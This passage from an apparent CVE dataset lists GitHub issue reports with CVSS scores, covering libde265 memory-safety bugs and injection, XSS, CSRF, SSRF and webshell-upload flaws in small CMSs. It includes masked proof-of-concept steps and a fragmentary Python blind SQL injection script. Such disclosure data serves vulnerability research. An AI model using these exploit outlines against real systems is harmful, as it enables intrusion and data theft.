        "description": "wuzhicms NUMBERTAG PATHTAG directory traversal vulnerability. A directory traversal vulnerability was discovered in WUZHI CMS NUMBERTAG There is a directory traversal vulnerability which allows authenticated remote attackers to list files in arbitrary directory. Vulnerability in PATHTAG ERRORTAG When APITAG is called, the transformation of input data is as follows: PATHTAG > /...// > /../ Exploit: APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.3,
        "impactScore": 1.4,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-21594",
        "Issue_Url_old": "https://github.com/strukturag/libde265/issues/233",
        "Issue_Url_new": "https://github.com/strukturag/libde265/issues/233",
        "Repo_new": "strukturag/libde265",
        "Issue_Created_At": "2019-12-24T08:25:45Z",
        "description": "heap buffer overflow in put_epel_hv_fallback when decoding file. heap buffer overflow in put_epel_hv_fallback when decoding file I found some problems during fuzzing Test Version dev version, git clone URLTAG Test Environment root APITAG lsb_release a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial Test Configure ./configure configure: configure: Building dec NUMBERTAG example: yes configure: Building sherlock NUMBERTAG example: no configure: Building encoder: yes configure: Test Program APITAG Asan Output ERRORTAG POC file FILETAG FILETAG password: APITAG CREDIT Zhao Liang, Huawei Weiran Labs",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-21595",
        "Issue_Url_old": "https://github.com/strukturag/libde265/issues/239",
        "Issue_Url_new": "https://github.com/strukturag/libde265/issues/239",
        "Repo_new": "strukturag/libde265",
        "Issue_Created_At": "2019-12-24T11:28:20Z",
        "description": "heap buffer overflow in mc_luma when decoding file. heap buffer overflow in mc_luma when decoding file I found some problems during fuzzing Test Version dev version, git clone URLTAG Test Environment root APITAG lsb_release a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial root APITAG uname a Linux ubuntu NUMBERTAG generic APITAG Ubuntu SMP Tue Jan NUMBERTAG UTC NUMBERTAG APITAG Test Configure ./configure configure: configure: Building dec NUMBERTAG example: yes configure: Building sherlock NUMBERTAG example: no configure: Building encoder: yes configure: Test Program APITAG Asan Output ERRORTAG POC file FILETAG password: APITAG CREDIT Zhao Liang, Huawei Weiran Labs",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-21596",
        "Issue_Url_old": "https://github.com/strukturag/libde265/issues/236",
        "Issue_Url_new": "https://github.com/strukturag/libde265/issues/236",
        "Repo_new": "strukturag/libde265",
        "Issue_Created_At": "2019-12-24T11:22:38Z",
        "description": "global buffer overflow in decode_CABAC_bit when decoding file. global buffer overflow in decode_CABAC_bit when decoding file I found some problems during fuzzing Test Version dev version, git clone URLTAG Test Environment root APITAG lsb_release a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial root APITAG uname a Linux ubuntu NUMBERTAG generic APITAG Ubuntu SMP Tue Jan NUMBERTAG UTC NUMBERTAG APITAG Test Configure ./configure configure: configure: Building dec NUMBERTAG example: yes configure: Building sherlock NUMBERTAG example: no configure: Building encoder: yes configure: Test Program APITAG Asan Output ERRORTAG POC file FILETAG password: APITAG CREDIT Zhao Liang, Huawei Weiran Labs",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-21597",
        "Issue_Url_old": "https://github.com/strukturag/libde265/issues/238",
        "Issue_Url_new": "https://github.com/strukturag/libde265/issues/238",
        "Repo_new": "strukturag/libde265",
        "Issue_Created_At": "2019-12-24T11:26:58Z",
        "description": "heap buffer overflow in mc_chroma when decoding file. heap buffer overflow in mc_chroma when decoding file I found some problems during fuzzing Test Version dev version, git clone URLTAG Test Environment root APITAG lsb_release a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial root APITAG uname a Linux ubuntu NUMBERTAG generic APITAG Ubuntu SMP Tue Jan NUMBERTAG UTC NUMBERTAG APITAG Test Configure ./configure configure: configure: Building dec NUMBERTAG example: yes configure: Building sherlock NUMBERTAG example: no configure: Building encoder: yes configure: Test Program APITAG Asan Output ERRORTAG POC file FILETAG password: APITAG CREDIT Zhao Liang, Huawei Weiran Labs",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-21598",
        "Issue_Url_old": "https://github.com/strukturag/libde265/issues/237",
        "Issue_Url_new": "https://github.com/strukturag/libde265/issues/237",
        "Repo_new": "strukturag/libde265",
        "Issue_Created_At": "2019-12-24T11:25:26Z",
        "description": "heap buffer overflow in APITAG when decoding file. heap buffer overflow in APITAG when decoding file I found some problems during fuzzing Test Version dev version, git clone URLTAG Test Environment root APITAG lsb_release a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial root APITAG uname a Linux ubuntu NUMBERTAG generic APITAG Ubuntu SMP Tue Jan NUMBERTAG UTC NUMBERTAG APITAG Test Configure ./configure configure: configure: Building dec NUMBERTAG example: yes configure: Building sherlock NUMBERTAG example: no configure: Building encoder: yes configure: Test Program APITAG Asan Output ERRORTAG POC file FILETAG password: APITAG CREDIT Zhao Liang, Huawei Weiran Labs",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-21599",
        "Issue_Url_old": "https://github.com/strukturag/libde265/issues/235",
        "Issue_Url_new": "https://github.com/strukturag/libde265/issues/235",
        "Repo_new": "strukturag/libde265",
        "Issue_Created_At": "2019-12-24T11:18:40Z",
        "description": "heap overflow in de NUMBERTAG image::available_zscan when decoding file. heap overflow in de NUMBERTAG image::available_zscan when decoding file I found some problems during fuzzing Test Version dev version, git clone URLTAG Test Environment root APITAG lsb_release a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial root APITAG uname a Linux ubuntu NUMBERTAG generic APITAG Ubuntu SMP Tue Jan NUMBERTAG UTC NUMBERTAG APITAG Test Configure ./configure configure: configure: Building dec NUMBERTAG example: yes configure: Building sherlock NUMBERTAG example: no configure: Building encoder: yes configure: Test Program APITAG Asan Output ERRORTAG POC file FILETAG password: APITAG CREDIT Zhao Liang, Huawei Weiran Labs",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-21600",
        "Issue_Url_old": "https://github.com/strukturag/libde265/issues/243",
        "Issue_Url_new": "https://github.com/strukturag/libde265/issues/243",
        "Repo_new": "strukturag/libde265",
        "Issue_Created_At": "2019-12-24T11:35:38Z",
        "description": "heap buffer overflow in APITAG when decoding file. heap buffer overflow in APITAG when decoding file I found some problems during fuzzing Test Version dev version, git clone URLTAG Test Environment root APITAG lsb_release a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial root APITAG uname a Linux ubuntu NUMBERTAG generic APITAG Ubuntu SMP Tue Jan NUMBERTAG UTC NUMBERTAG APITAG Test Configure ./configure configure: configure: Building dec NUMBERTAG example: yes configure: Building sherlock NUMBERTAG example: no configure: Building encoder: yes configure: Test Program APITAG Asan Output ERRORTAG POC file FILETAG password: APITAG CREDIT Zhao Liang, Huawei Weiran Labs",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-21601",
        "Issue_Url_old": "https://github.com/strukturag/libde265/issues/241",
        "Issue_Url_new": "https://github.com/strukturag/libde265/issues/241",
        "Repo_new": "strukturag/libde265",
        "Issue_Created_At": "2019-12-24T11:32:05Z",
        "description": "stack buffer overflow in put_qpel_fallback when decoding file. stack buffer overflow in put_qpel_fallback when decoding file I found some problems during fuzzing Test Version dev version, git clone URLTAG Test Environment root APITAG lsb_release a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial root APITAG uname a Linux ubuntu NUMBERTAG generic APITAG Ubuntu SMP Tue Jan NUMBERTAG UTC NUMBERTAG APITAG Test Configure ./configure configure: configure: Building dec NUMBERTAG example: yes configure: Building sherlock NUMBERTAG example: no configure: Building encoder: yes configure: Test Program APITAG Asan Output ERRORTAG POC file FILETAG FILETAG password: APITAG CREDIT Zhao Liang, Huawei Weiran Labs",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-21602",
        "Issue_Url_old": "https://github.com/strukturag/libde265/issues/242",
        "Issue_Url_new": "https://github.com/strukturag/libde265/issues/242",
        "Repo_new": "strukturag/libde265",
        "Issue_Created_At": "2019-12-24T11:33:52Z",
        "description": "heap buffer overflow in APITAG when decoding file. heap buffer overflow in APITAG when decoding file I found some problems during fuzzing Test Version dev version, git clone URLTAG Test Environment root APITAG lsb_release a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial root APITAG uname a Linux ubuntu NUMBERTAG generic APITAG Ubuntu SMP Tue Jan NUMBERTAG UTC NUMBERTAG APITAG Test Configure ./configure configure: configure: Building dec NUMBERTAG example: yes configure: Building sherlock NUMBERTAG example: no configure: Building encoder: yes configure: Test Program APITAG Asan Output ERRORTAG POC file FILETAG password: APITAG CREDIT Zhao Liang, Huawei Weiran Labs",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-21603",
        "Issue_Url_old": "https://github.com/strukturag/libde265/issues/240",
        "Issue_Url_new": "https://github.com/strukturag/libde265/issues/240",
        "Repo_new": "strukturag/libde265",
        "Issue_Created_At": "2019-12-24T11:29:40Z",
        "description": "heap buffer overflow in put_qpel NUMBERTAG fallback NUMBERTAG when decoding file. heap buffer overflow in put_qpel NUMBERTAG fallback NUMBERTAG when decoding file I found some problems during fuzzing Test Version dev version, git clone URLTAG Test Environment root APITAG lsb_release a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial root APITAG uname a Linux ubuntu NUMBERTAG generic APITAG Ubuntu SMP Tue Jan NUMBERTAG UTC NUMBERTAG APITAG Test Configure ./configure configure: configure: Building dec NUMBERTAG example: yes configure: Building sherlock NUMBERTAG example: no configure: Building encoder: yes configure: Test Program APITAG Asan Output ERRORTAG POC file FILETAG password: APITAG CREDIT Zhao Liang, Huawei Weiran Labs",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-21604",
        "Issue_Url_old": "https://github.com/strukturag/libde265/issues/231",
        "Issue_Url_new": "https://github.com/strukturag/libde265/issues/231",
        "Repo_new": "strukturag/libde265",
        "Issue_Created_At": "2019-12-24T03:25:24Z",
        "description": "heap buffer overflow in decode file. heap buffer overflow in decode file I found some problems during fuzzing Test Version dev version, git clone URLTAG Test Environment root APITAG lsb_release a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial Test Configure ./configure configure: configure: Building dec NUMBERTAG example: yes configure: Building sherlock NUMBERTAG example: no configure: Building encoder: yes configure: Test Program APITAG Asan Output ERRORTAG POC file FILETAG password: APITAG CREDIT Zhao Liang, Huawei Weiran Labs",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-21605",
        "Issue_Url_old": "https://github.com/strukturag/libde265/issues/234",
        "Issue_Url_new": "https://github.com/strukturag/libde265/issues/234",
        "Repo_new": "strukturag/libde265",
        "Issue_Created_At": "2019-12-24T11:14:43Z",
        "description": "segment fault in apply_sao_internal when decoding file. segment fault in apply_sao_internal when decoding file I found some problems during fuzzing Test Version dev version, git clone URLTAG Test Environment root APITAG lsb_release a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial root APITAG uname a Linux ubuntu NUMBERTAG generic APITAG Ubuntu SMP Tue Jan NUMBERTAG UTC NUMBERTAG APITAG Test Configure ./configure configure: configure: Building dec NUMBERTAG example: yes configure: Building sherlock NUMBERTAG example: no configure: Building encoder: yes configure: Test Program APITAG Asan Output ERRORTAG POC file FILETAG password: APITAG CREDIT Zhao Liang, Huawei Weiran Labs",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-21606",
        "Issue_Url_old": "https://github.com/strukturag/libde265/issues/232",
        "Issue_Url_new": "https://github.com/strukturag/libde265/issues/232",
        "Repo_new": "strukturag/libde265",
        "Issue_Created_At": "2019-12-24T08:22:59Z",
        "description": "heap buffer overflow in put_epel NUMBERTAG fallback when decoding file. heap buffer overflow in put_epel NUMBERTAG fallback when decoding file I found some problems during fuzzing Test Version dev version, git clone URLTAG Test Environment root APITAG lsb_release a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial Test Configure ./configure configure: configure: Building dec NUMBERTAG example: yes configure: Building sherlock NUMBERTAG example: no configure: Building encoder: yes configure: Test Program APITAG Asan Output ERRORTAG POC file FILETAG password: APITAG CREDIT Zhao Liang, Huawei Weiran Labs",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-21648",
        "Issue_Url_old": "https://github.com/shadoweb/wdja/issues/9",
        "Issue_Url_new": "https://github.com/shadoweb/wdja/issues/9",
        "Repo_new": "shadoweb/wdja",
        "Issue_Created_At": "2019-12-26T15:55:23Z",
        "description": "file deletion vulnerability. Vulnerability file PATHTAG FILETAG parameter file accept without filtered,attacker can delete any files with changed the file's value\u3002 PATHTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-21649",
        "Issue_Url_old": "https://github.com/lolipop1234/XXD/issues/4",
        "Issue_Url_new": "https://github.com/lolipop1234/xxd/issues/4",
        "Repo_new": "lolipop1234/xxd",
        "Issue_Created_At": "2019-12-27T02:50:43Z",
        "description": "SSRF of Myucms NUMBERTAG PATHTAG APITAG method.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-21650",
        "Issue_Url_old": "https://github.com/lolipop1234/XXD/issues/6",
        "Issue_Url_new": "https://github.com/lolipop1234/xxd/issues/6",
        "Repo_new": "lolipop1234/xxd",
        "Issue_Created_At": "2019-12-27T02:56:43Z",
        "description": "Arbitrary command execution of Myucms NUMBERTAG FILETAG APITAG method.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-21651",
        "Issue_Url_old": "https://github.com/lolipop1234/XXD/issues/3",
        "Issue_Url_new": "https://github.com/lolipop1234/xxd/issues/3",
        "Repo_new": "lolipop1234/xxd",
        "Issue_Created_At": "2019-12-27T02:42:28Z",
        "description": "Arbitrary command execution of Myucms NUMBERTAG FILETAG APITAG method. Vulnerability location code PATHTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-21652",
        "Issue_Url_old": "https://github.com/lolipop1234/XXD/issues/7",
        "Issue_Url_new": "https://github.com/lolipop1234/xxd/issues/7",
        "Repo_new": "lolipop1234/xxd",
        "Issue_Created_At": "2019-12-27T02:57:04Z",
        "description": "Arbitrary command execution of Myucms NUMBERTAG FILETAG APITAG method.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-21653",
        "Issue_Url_old": "https://github.com/lolipop1234/XXD/issues/5",
        "Issue_Url_new": "https://github.com/lolipop1234/xxd/issues/5",
        "Repo_new": "lolipop1234/xxd",
        "Issue_Created_At": "2019-12-27T02:51:36Z",
        "description": "SSRF of Myucms NUMBERTAG PATHTAG APITAG method.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-21654",
        "Issue_Url_old": "https://github.com/emlog/emlog/issues/55",
        "Issue_Url_new": "https://github.com/emlog/emlog/issues/55",
        "Repo_new": "emlog/emlog",
        "Issue_Created_At": "2019-12-30T07:23:54Z",
        "description": "emlog NUMBERTAG zip template getshell vulnerability. different as plugin,in the same function but not same includer. vul founded in FILETAG line NUMBERTAG upload a zip file with webshell in this page. FILETAG Limit in PATHTAG line NUMBERTAG FILETAG we need create a dir named FILETAG and touch a webshell named FILETAG too. like this\uff1a FILETAG upload and gotshell: PATHTAG (); FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2020-21656",
        "Issue_Url_old": "https://github.com/gosea/xyhcms3/issues/2",
        "Issue_Url_new": "https://github.com/gosea/xyhcms3/issues/2",
        "Repo_new": "gosea/xyhcms3",
        "Issue_Created_At": "2019-12-31T08:29:04Z",
        "description": "There is a stored xss in PATHTAG FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-21658",
        "Issue_Url_old": "https://github.com/shadoweb/wdja/issues/10",
        "Issue_Url_new": "https://github.com/shadoweb/wdja/issues/10",
        "Repo_new": "shadoweb/wdja",
        "Issue_Created_At": "2020-01-01T16:43:03Z",
        "description": "wdja has csrf vulnerability. wdja has csrf APITAG csrf vulnerability is often used in combination with phishing APITAG use csrfpoc Establish a phishing website. If the victim visits the phishing website page while logging in to his website, the csrf vulnerability will be exploited. poc\uff1a APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Authentication method\uff1a Login APITAG on csrfpoc\uff0cthen new Webmaster will be added. FILETAG FILETAG FILETAG wdja APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-21667",
        "Issue_Url_old": "https://github.com/che-my/fastadmin-tp6/issues/2",
        "Issue_Url_new": "https://github.com/che-my/fastadmin-tp6/issues/2",
        "Repo_new": "che-my/fastadmin-tp6",
        "Issue_Created_At": "2019-12-30T02:57:21Z",
        "description": "Fastadmin tp6 SQL injection. When a user with administrator rights has logged in the background, SQL injection can be performed during sorting by constructing malicious data. In file APITAG line NUMBERTAG the 'table' parameter passed in here is not filtered,so we can pass a malicious parameter for SQL injection. POC: CODETAG Example: FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2020-21674",
        "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/1298",
        "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/1298",
        "Repo_new": "libarchive/libarchive",
        "Issue_Created_At": "2019-12-28T18:16:57Z",
        "description": "Heap buffer overflow in APITAG (archive_string.c). bsdtar: An error in APITAG (archive_string.c) triggers an out of bounds write in heap memory that results into a crash, via a specially crafted archive file. This bug was found using our custom fuzzer. Basic Information: versions of libarchive NUMBERTAG dev How you obtained it: built from source libarchive NUMBERTAG dev ( URLTAG Tested OS: Linu NUMBERTAG generic NUMBERTAG Tested compiler version : gcc version NUMBERTAG What other files were involved? To trigger the bug, use the the crash file (unzip crash APITAG FILETAG =============== Compile with address address sanitizer ( fsanitize=addrsan) Command to reproduce the bug: $ ./bsdtar t f crash file Output (partial): ERRORTAG Crash analysis : In APITAG (archive_string.c), upon execution of the crashing input (crash file): CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-21677",
        "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/123",
        "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/123",
        "Repo_new": "saitoha/libsixel",
        "Issue_Created_At": "2019-12-24T03:33:01Z",
        "description": "heap buffer overflow in APITAG at APITAG version : img2sixel NUMBERTAG OS : Ubuntu NUMBERTAG configured with: libcurl: yes libpng: yes libjpeg: yes gdk pixbuf2: no GD: no There is a heap buffer overflow in APITAG at APITAG please run following cmd to reproduce it. APITAG poc URLTAG ASAN LOG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-21725",
        "Issue_Url_old": "https://github.com/CoColizdf/CVE/issues/1",
        "Issue_Url_new": "https://github.com/cocococococoli/cve/issues/1",
        "Repo_new": "cocococococoli/cve",
        "Issue_Created_At": "2019-12-31T02:30:25Z",
        "description": "APITAG NUMBERTAG have unauthorized sleep blind injection SQL vulnerability pid parameter. APITAG NUMBERTAG have unauthorized sleep blind injection SQL vulnerability pid parameter A unauthorized sleep blind injection SQL vulnerability was discovered in APITAG CMS NUMBERTAG about pid parameter this CMS offical website > FILETAG FILETAG vul url > FILETAG poc ERRORTAG FILETAG FILETAG Vulnerability file PATHTAG FILETAG FILETAG FILETAG from APITAG APITAG Tech)",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-21726",
        "Issue_Url_old": "https://github.com/CoColizdf/CVE/issues/2",
        "Issue_Url_new": "https://github.com/cocococococoli/cve/issues/2",
        "Repo_new": "cocococococoli/cve",
        "Issue_Created_At": "2019-12-31T02:34:51Z",
        "description": "A unauthorized sleep blind injection SQL vulnerability was discovered in APITAG CMS NUMBERTAG about cid parameter. APITAG NUMBERTAG have unauthorized sleep blind injection SQL vulnerability cid parameter A unauthorized sleep blind injection SQL vulnerability was discovered in APITAG CMS NUMBERTAG about cid parameter this CMS offical website > FILETAG FILETAG vuln url > FILETAG poc ERRORTAG FILETAG FILETAG vuln file > PATHTAG FILETAG PATHTAG FILETAG FILETAG from APITAG APITAG Tech)",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-21729",
        "Issue_Url_old": "https://github.com/CoColizdf/CVE/issues/3",
        "Issue_Url_new": "https://github.com/cocococococoli/cve/issues/3",
        "Repo_new": "cocococococoli/cve",
        "Issue_Created_At": "2020-01-03T10:30:26Z",
        "description": "JEECMS NUMBERTAG have Stored XSS vulnerability. this is cms offical website > FILETAG A stored xss vulnerability was discovered in JEECMS NUMBERTAG FILETAG poc payload is APITAG FILETAG after submit ,refresh this page Trigger XSS Vulnerability FILETAG APITAG FILETAG FILETAG Vulnerability file PATHTAG CODETAG PATHTAG FILETAG PATHTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-21784",
        "Issue_Url_old": "https://github.com/slackero/phpwcms/issues/286",
        "Issue_Url_new": "https://github.com/slackero/phpwcms/issues/286",
        "Repo_new": "slackero/phpwcms",
        "Issue_Created_At": "2020-01-16T07:16:02Z",
        "description": "Code Injection Vulnerability can Getshell. Code audit FILETAG code Open the secure boot file APITAG file path is APITAG APITAG it include APITAG in line NUMBERTAG FILETAG FILETAG code open file APITAG and you can see line NUMBERTAG FILETAG FILETAG code tarck the function APITAG in APITAG in line NUMBERTAG FILETAG and in line NUMBERTAG it will call function APITAG to write the config file in line NUMBERTAG FILETAG FILETAG Testing getshell in this interface,you can input some infomation like this. FILETAG payload APITAG After completing it, click Submit.It will show some error information,but you can access like this address and you can see it run the injection code. FILETAG Solution Filtering some sensitive characters.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-21806",
        "Issue_Url_old": "https://github.com/ectouch/ectouch/issues/5",
        "Issue_Url_new": "https://github.com/ectouch/ectouch/issues/5",
        "Repo_new": "ectouch/ectouch",
        "Issue_Created_At": "2020-01-04T06:27:04Z",
        "description": "SQL Injection vulnerability. Order\uff1a EMAILTAG .cn poc: import requests import re,string import APITAG def APITAG param={} url=\" URLTAG \" payload_len NUMBERTAG or APITAG a\"' APITAG i NUMBERTAG while i NUMBERTAG payload_len_i = APITAG APITAG goods_i = APITAG param['goods'] = goods_i print(param) r = APITAG if \"cart_number\" in r.text: print(\"len:\",i) return i i NUMBERTAG def get_database(len): param={} database_name=\"\" url=\" URLTAG \" payload_database NUMBERTAG or APITAG a\"' APITAG chr_str = APITAG + APITAG + APITAG for i in range(len): for j in chr_str: APITAG APITAG goods_i = APITAG param['goods'] = goods_i r = APITAG if \"cart_number\" in r.text: database_name+=j APITAG APITAG get_database(len)",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-21813",
        "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/182",
        "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/182",
        "Repo_new": "libredwg/libredwg",
        "Issue_Created_At": "2020-01-10T06:17:10Z",
